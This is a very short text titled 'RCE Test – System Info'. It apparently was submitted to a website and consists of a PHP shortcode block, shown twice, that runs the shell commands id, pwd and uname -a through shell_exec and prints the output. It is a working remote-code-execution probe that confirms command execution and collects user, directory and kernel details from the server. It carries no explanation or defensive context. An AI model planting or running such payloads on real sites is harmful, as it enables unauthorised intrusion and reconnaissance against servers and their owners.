RCE Test – System Info
[php]$output = shell_exec(‘id 2>&1’); echo ‘USER: ‘ . $output; echo ‘\nPWD: ‘ . shell_exec(‘pwd 2>&1’); echo ‘\nUNAME: ‘ . shell_exec(‘uname -a 2>&1’);[/php]
[php]$output = shell_exec(‘id 2>&1’); echo ‘USER: ‘ . $output; echo ‘\nPWD: ‘ . shell_exec(‘pwd 2>&1’); echo ‘\nUNAME: ‘ . shell_exec(‘uname -a 2>&1’);[/php]